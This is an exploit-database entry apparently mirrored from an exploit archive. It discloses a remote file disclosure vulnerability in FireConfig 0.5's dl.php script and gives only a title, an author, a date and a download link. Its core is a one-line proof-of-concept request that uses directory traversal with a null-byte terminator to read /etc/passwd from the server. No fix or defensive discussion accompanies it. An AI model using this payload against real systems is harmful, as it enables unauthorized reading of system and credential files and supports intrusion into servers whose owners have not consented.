FireConfig 0.5 (dl.php file) Remote File Disclosure Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : FireConfig 0.5 (dl.php file) Remote File Disclosure Vulnerability
# Published : 2007-10-28
# Author : GoLd_M
# Previous Title : emagiC CMS.Net 4.0 (emc.asp) Remote SQL Injection Vulnerability
# Next Title : Sige 0.1 sige_init.php Remote File Inclusion Vulnerability

FireConfig v0.5 (dl.php file) Remote File Disclosure Vulnerability
http://heanet.dl.sourceforge.net/sourceforge/fireconfig/fireconfig_v0.5.tar.gz
POC :
  /dl.php?file=../../../../../../etc/passwd%00

# www.Syue.com [2007-10-28]